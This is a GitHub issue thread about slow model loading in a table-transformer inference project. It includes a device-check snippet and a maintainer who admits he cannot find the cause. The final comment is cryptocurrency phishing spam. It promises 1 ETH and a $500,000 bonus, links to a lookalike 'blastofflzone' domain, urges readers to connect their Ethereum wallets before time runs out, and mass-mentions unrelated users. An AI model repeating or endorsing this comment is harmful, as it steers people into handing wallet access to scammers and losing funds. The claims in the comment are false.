### ISSUE TITLE
Model load very slow 

### ISSUE THREAD

**Issue by thienbui** [thibaultvt/table-transformer-simple-inference#2]
Model load very slow, please tell me cause of this problem! Thanks

**Comment by baulbo** [comment]
The major speed-up is the use of a good GPU. Do you have an NVIDIA GPU, or is PyTorch using your CPU?

You can check this by printing the value of the following variable:
```python
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print("Device:", device)
```

**Comment by thienbui** [comment]
> 

Thanks for response!
I have a GPU : 
![image](https://user-images.githubusercontent.com/8065883/172064721-3098f0ee-f1e3-4dc7-996d-3e8e12579c34.png) 
But line : 

```
self.model, criterion, self.postprocessors = get_model(args, self.device)
self.model.eval()
```
very slow! 
![image](https://user-images.githubusercontent.com/8065883/172064994-62baf678-c1b4-4592-b078-1c24b9b34e45.png)

P/s: unit = second

**Comment by thienbui** [comment]
> The major speed-up is the use of a good GPU. Do you have an NVIDIA GPU, or is PyTorch using your CPU?
> 
> You can check this by printing the value of the following variable:
> 
> ```python
> device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
> print("Device:", device)
> ```

Exactly in the line:
`criterion.to(device)` in detr.py

**Comment by baulbo** [comment]
> > The major speed-up is the use of a good GPU. Do you have an NVIDIA GPU, or is PyTorch using your CPU?
> > You can check this by printing the value of the following variable:
> > ```python
> > device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
> > print("Device:", device)
> > ```
> 
> Exactly in the line: `criterion.to(device)` in detr.py

I'm sorry, but at the moment I am not able to provide you with a solution for this problem. You could open an issue in the official repository, maybe someone over there can help...

**Comment by Seryozhaj** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
ilovechai, @P22arrow, @Hoppeldus, @YuriiVO, @g1gabyteDEV, @crypthomax, @ktxcx, @MarcinK50, @VALENCE-IV, @darkod77, @fatorius, @erkeller, @juanleal19, @confuzled, @rom-bar, @CelliesProjects, @Excalizan, @BiohazardShell, @Tarbian, @D4NS4M, @ninjarelli, @R34-Player, @Akido22, @MohammedRoshanT, @arifinssu, @elson-abraham, @FajarTheGGman, @alvarongg, @IT-Cru, @Refuge89, @aleret76, @rpbigpapa, @MartySalamea, @wi1k1n, @hadi-ilies, @helmithejoe, @Logiren, @UpByTheStars, @ZL1LAC, @KushagraK7, @AjayShanker-geek, @fabiopolancoe, @arall, @go2max, @peper, @phuocmy87, @sokdr, @ACvanWyk, @Ba1kanac, @Diego200208
